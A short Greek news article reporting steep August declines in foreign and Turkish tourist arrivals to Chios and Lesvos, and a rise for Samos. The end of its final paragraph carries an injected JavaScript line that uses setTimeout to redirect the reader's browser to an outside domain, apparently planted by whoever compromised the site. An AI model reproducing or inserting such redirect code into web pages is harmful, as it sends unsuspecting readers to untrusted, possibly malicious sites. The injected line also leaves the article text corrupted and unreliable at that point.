Μείωση του τουρισμού σε Χίο και Λέσβο

0
5

 

Κατακόρυφη ήταν και τον Αύγουστο η μείωση της τουριστικής κίνησης εξωτερικού προς τη Χίο. Σύμφωνα με τα επίσημα στοιχεία του αεροδρομίου του νησιού η μείωση, ήταν της τάξης του 76,32%.

Συγκεκριμένα έφτασαν 431 επιβάτες, έναντι 1820 πέρυσι. Μειωμένη ήταν και η κίνηση αεροσκαφών πτήσεων τσάρτερ από το εξωτερικό στη Χίο. Όλο τον Αύγουστο υπήρξαν μόλις 20 πτήσεις έναντι 52 πέρυσι. Μείωση της τάξης του 61,54%.

«Κατρακύλα» διαπιστώθηκε και στις αφίξεις Τούρκων επισκεπτών. Συγκεκριμένα, τον Αύγουστο έφτασαν στη Χίο μέσω Τσεσμέ 11.446 Τούρκοι επισκέπτες, ενώ τον Αύγουστο του 2015 είχαν φτάσει 16.520. Στο 42% ανήλθε η μείωση των Τούρκων τουριστών στη Λέσβο κατά την ίδια χρονική περίοδο.

Ωστόσο, αξίζει να σημειωθεί ότι σε αντίθεση με τη Χίο και τη Λέσβο οι Τούρκοι τουρίστες που επισκέφτηκαν τη Σάμο, τον Αύγουστο ήταν κατά 46% αυξημένοι σε σχέση με την ίδια περίοδο πέρυσι. Σύμφωνα με τον Αντιπεριφερειάρχη Σάμου Νίκο Κατρακάζο, «η εντυπωσιακή αύξηση των Τούρκων επισκεπτών στο νησί», οφείλεται μεταξύ άλλων στην επιτυχημένη λειτουργία της πύλης εισόδου Καρλοβάσου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here